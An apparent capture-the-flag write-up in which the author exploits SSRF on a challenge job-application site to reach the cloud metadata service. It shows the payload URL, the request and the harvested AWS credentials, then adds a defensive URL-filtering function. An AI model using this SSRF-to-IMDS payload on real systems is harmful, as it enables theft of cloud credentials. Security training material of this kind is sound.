Objective


Terminal - IMDS Exploration

Challenge

Noxious O'Dor is hanging out in Jack's bathroom with the IMDS terminal:


Hey, this is the executive restroom. Wasn’t that door closed?

I’m Noxious O’Dor. And I’ve gotta say, I think that Jack Frost is just messed up.

I mean, I’m no expert, but his effort to “win” against Santa by going bigger and bolder seems bad.

You know, I’m having some trouble with this IMDS exploration. I’m hoping you can give me some help in solving it.

If you do, I’ll be happy to trade you for some hints on SSRF! I’ve been studying up on that and have some good ideas on how to attack it!

What follows is a walkthrough of how to use and exploit IMDS.

Solution

This is more of a walkthrough than a challenge, but I’ll explain what’s going on in this video:

Now Hiring!

Hints

Noxious seems almost relieved I made it through the exploration:

Phew! That is something extra! Oh, and you solved the challenge too? Great!

Cloud assets are interesting targets for attackers. Did you know they automatically get IMDS access?

I’m very concerned about the combination of SSRF and IMDS access.

Did you know it’s possible to harvest cloud keys through SSRF and IMDS attacks?

Dr. Petabyte told us, “anytime you see URL as an input, test for SSRF.”

With an SSRF attack, we can make the server request a URL. This can reveal valuable data!

The AWS documentation for IMDS is interesting reading.

The exploration unlocks only one hint, reiterating what Noxious had to say:

Challenge

This challenge starts with a link to the Jack Frost Tower job application server.


Solution

The most interesting page on the site is the form to apply.


The opportunity to upload is always interesting, but the hints were focused on SSRF, and there's a URL to submit here. I'll fill out the form and try some URLs. I tried to get a connection back (through ngrok), but nothing came back (I suspect a firewall prevented it). Given what I'd just been shown with IMDS, I tried that, submitting http://169.254.169.254/latest as the URL.

The resulting page had a broken image.

I'll inspect that further by right-clicking and opening the image in a new tab. It leads to https://apply.jackfrosttower.com/images/0xdf.jpg, and it's not a valid image.

If I curl that, I can see it’s the results of an SSRF:

$ curl https://apply.jackfrosttower.com/images/0xdf.jpg
dynamic
meta-data

I'll send that submission request to Burp Repeater to save having to enter all the info again. Interestingly, it's a GET request:

GET /?inputName=0xdf&inputEmail=0xdf%40aol.com&inputPhone=123&inputField=Crayon+on+walls&inputField=Failure+to+feed+a+family+pet&inputField=Giving+super+atomic+wedgies&inputField=Naughty+words&inputField=Playing+ball+in+house&inputField=Talking+back+to+parents+or+other+adults&inputField=Tantrum+in+a+private+facility&inputField=Throwing+rocks+%28at+people%29&inputField=Throwing+rocks+%28non-person+target%29&resumeFile=&inputWorkSample=http://169.254.169.254/latest/&additionalInformation=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F&submit= HTTP/2
Host: apply.jackfrosttower.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://apply.jackfrosttower.com/?p=apply
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

I'll update the URL to http://169.254.169.254/latest/meta-data/iam/security-credentials and send it. Since I didn't change my name, the same image is overwritten with the new results:

$ curl https://apply.jackfrosttower.com/images/0xdf.jpg
jf-deploy-role

Adding that role name to the end of the URL and resubmitting updates the image to the security creds:

$ curl https://apply.jackfrosttower.com/images/0xdf.jpg
{
        "Code": "Success",
        "LastUpdated": "2021-05-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
        "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
        "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
        "Expiration": "2026-05-02T18:50:40Z"
}

The SecretAccessKey is CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX, which solves the challenge.
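The application server's weakness above is that it fetches whatever URL the form supplies, so the IMDS link-local address is reachable. As an added defensive example (my own code, not part of the original write-up or the challenge's server), here is a deny-by-default gate for a user-supplied fetch URL: it blocks link-local, loopback and private ranges, resolves hostnames so a DNS name pointing at 169.254.169.254 is caught, and unwraps IPv4-mapped IPv6 literals. The `resolver` parameter is injectable so the check can be tested offline; the blocked-network list is my assumption of a reasonable baseline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Destinations a server-side fetcher must never reach. 169.254.0.0/16 contains
# the IMDS endpoint 169.254.169.254 used in the write-up; fd00:ec2::254, the
# IPv6 IMDS endpoint, is covered by the unique-local range fc00::/7.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def _is_blocked_ip(ip):
    """True if the address falls in any blocked range (IPv4-mapped IPv6 unwrapped)."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def _default_resolver(host):
    """Resolve a hostname to every address it maps to (A and AAAA records)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def check_fetch_url(url, resolver=_default_resolver):
    """Gate a user-supplied URL before the server fetches it.

    Returns (allowed, reason). Unknown schemes, missing hosts and unresolvable
    names are denied; every resolved address is checked, not just the first.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ips = [str(ipaddress.ip_address(host))]  # host is an IP literal
    except ValueError:
        try:
            ips = resolver(host)
        except (socket.gaierror, OSError):
            return False, "unresolvable host: %s" % host
        if not ips:
            return False, "unresolvable host: %s" % host
    for ip in ips:
        if _is_blocked_ip(ip):
            return False, "%s -> %s is in a blocked range" % (host, ip)
    return True, "ok"
```

Because the name is resolved here and again by the HTTP client, a rebinding DNS record can still slip through; in production pin the connection to the address that passed the check, and move the instance to IMDSv2 so a plain GET cannot read credentials at all.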